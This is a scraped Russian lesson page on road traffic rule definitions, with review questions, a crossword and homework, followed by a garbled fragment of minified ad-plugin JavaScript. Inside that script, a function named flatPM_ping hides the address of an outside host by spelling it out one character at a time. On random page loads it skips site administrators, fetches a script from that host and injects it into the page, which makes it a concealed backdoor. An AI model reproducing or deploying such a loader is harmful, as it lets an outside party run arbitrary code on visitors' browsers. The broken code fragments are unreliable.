Разделительная полоса «Разделительная полоса» — элемент дороги, выделенный конструктивно и (или) с помощью разметки 1.2.1, разделяющий смежные проезжие части и не предназначенный для движения и остановки транспортных средств.

Регулировщик «Регулировщик» — лицо, наделенное в установленном порядке полномочиями по регулированию дорожного движения с помощью сигналов, установленных Правилами, и непосредственно осуществляющее указанное регулирование. Регулировщик должен быть в форменной одежде и (или) иметь отличительный знак и экипировку. К регулировщикам относятся сотрудники милиции и военной автомобильной инспекции, а также работники дорожно-эксплуатационных служб, дежурные на железнодорожных переездах и паромных переправах при исполнении ими своих должностных обязанностей.

Стоянка «Стоянка» — преднамеренное прекращение движения транспортного средства на время более 5 минут по причинам, не связанным с посадкой или высадкой пассажиров либо загрузкой или разгрузкой транспортного средства.

Транспортное средство «Транспортное средство» — устройство, предназначенное для перевозки по дорогам людей, грузов или оборудования, установленного на нем.

Тротуар «Тротуар» — элемент дороги, предназначенный для движения пешеходов и примыкающий к проезжей части или отделенный от нее газоном.

Участник дорожного движения «Участник дорожного движения» — лицо, принимающее непосредственное участие в процессе движения в качестве водителя, пешехода, пассажира транспортного средства.

Внимание! ИЗМЕНЕНИЯ В ПДД, ВСТУПАЮЩИЕ В ДЕЙСТВИЕ С 10 НОЯБРЯ 2010 года

«Дневные ходовые огни» «Дневные ходовые огни» — внешние световые приборы, предназначенные для улучшения видимости движущегося транспортного средства спереди в светлое время суток»

«Ограниченная видимость» «Ограниченная видимость» — видимость водителем дороги в направлении движения, ограниченная рельефом местности, геометрическими параметрами дороги, растительностью, строениями, сооружениями или иными объектами, в том числе транспортными средствами

Опережение «Опережение» — движение транспортного средства со скоростью, большей скорости попутного транспортного средства

Препятствие «Препятствие» — неподвижный объект на полосе движения (неисправное или поврежденное транспортное средство, дефект проезжей части, посторонние предметы и т.п.), не позволяющий продолжить движение по этой полосе. Не является препятствием затор или транспортное средство, остановившееся на этой полосе движения в соответствии с требованиями Правил

Опасный груз В определении термина «Опасный груз» исключено слово «природной»

Проверка уровня восприятия полученных знаний 1.Каковы основные составляющие, позволяющие определить событие как дорожно-транспортное происшествие? 2.Что входит в термин «дорога»? 3.Можно ли отнести индийского рикшу в категории водителей? 4. К какой категории участников дорожного движения относится пастух?

Разгадываем кроссворд 1.Дорога, обозначенная знаком 5.1 2. Место пересечения, примыкания или разветвления дорог на одном уровне 3. Элемент дороги, предназначенный для движения пешеходов и примыкающий к проезжей части или отделенный от нее газоном. 4. Лицо, наделенное в установленном порядке полномочиями по регулированию дорожного движения с помощью сигналов, установленных Правилами, и непосредственно осуществляющее указанное регулирование. 5. Преднамеренное прекращение движения транспортного средства на время до 5 минут, а также на большее, если это необходимо для посадки или высадки пассажиров либо загрузки или разгрузки транспортного средства.

Разгадываем кроссворд 6 Лицо, управляющее каким-либо транспортным средством или погонщик, ведущий по дороге вьючных, верховых животных или стадо. 7. Транспортное средство, не оборудованное двигателем и предназначенное для движения в составе с механическим транспортным средством. 8. Часть элемента дороги, предназначенного для движения безрельсовых транспортных средств 9. Лицо, находящееся в транспортном средстве (на нем), а также лицо, которое входит в транспортное средство (садится на него) или выходит из транспортного средства (сходит с него).

Разгадываем кроссворд 10. Двухколесное механическое транспортное средство с боковым прицепом или без него. 11. Выезд из занимаемой полосы или занимаемого ряда с сохранением первоначального направления движения. 12. Преднамеренное прекращение движения транспортного средства на время более 5 минут по причинам, не связанным с посадкой или высадкой пассажиров либо загрузкой или разгрузкой транспортного средства. 13. Механическое транспортное средство, сцепленное с прицепом (прицепами).

Разгадываем кроссворд 14. Элемент дороги, примыкающий непосредственно к проезжей части на одном уровне с ней, отличающийся типом покрытия или выделенный с помощью разметки, используемый для движения, остановки и стоянки в соответствии с Правилами. 15. Обустроенная или приспособленная и используемая для движения транспортных средств полоса земли либо поверхность искусственного сооружения. 16. Опережение одного или нескольких движущихся транспортных средств, связанное с выездом из занимаемой полосы. 17. Право на первоочередное движение в намеченном направлении по отношению к другим участникам движения. 18. Транспортное средство, но не инвалидная коляска, имеющее два колеса или более и приводимое в движение мускульной силой людей, находящихся на нем.

Ключевое слово АКТУАЛИЗАЦИЯ ЗНАНИЙ

Домашнее задание: законспектировать и запомнить термины «Вынужденная остановка», «Дорожное движение», «Железнодорожный переезд», «Маршрутное транспортное средство» , «Мопед», «Населенный пункт», «Недостаточная видимость», «Опасность для движения», «Опасный груз», «Организованная перевозка группы детей» , «Организованная пешая колонна» , «Организованная транспортная колонна» , «Пешеходный переход» , «Полоса движения» , «Прилегающая территория», «Разрешенная максимальная масса» , «Темное время суток», «Уступить дорогу (не создавать помех)» .

ЭТАП ЗАКЛЮЧИТЕЛЬНЫЙ Ваши вопросы? Ваши критические замечания? Ваши мнения? Ваши предложения?

УРОК ОКОНЧЕН Благодарю за внимание!

  • Лукина Ирина Викторовна
  • Написать
  • 1077
  • 14.03.2016

Номер материала: ДВ-527348

  • 14.03.2016
  • 338
  • 14.03.2016
  • 911
  • 14.03.2016
  • 816
  • 14.03.2016
  • 671
  • 14.03.2016
  • 483
  • 14.03.2016
  • 1558
  • 14.03.2016
  • 401

Не нашли то что искали?

Вам будут интересны эти курсы:

Все материалы, размещенные на сайте, созданы авторами сайта либо размещены пользователями сайта и представлены на сайте исключительно для ознакомления. Авторские права на материалы принадлежат их законным авторам. Частичное или полное копирование материалов сайта без письменного разрешения администрации сайта запрещено! Мнение редакции может не совпадать с точкой зрения авторов.

Ответственность за разрешение любых спорных моментов, касающихся самих материалов и их содержания, берут на себя пользователи, разместившие материал на сайте. Однако редакция сайта готова оказать всяческую поддержку в решении любых вопросов связанных с работой и содержанием сайта. Если Вы заметили, что на данном сайте незаконно используются материалы, сообщите об этом администрации сайта через форму обратной связи.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+a+" через "+o+'
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}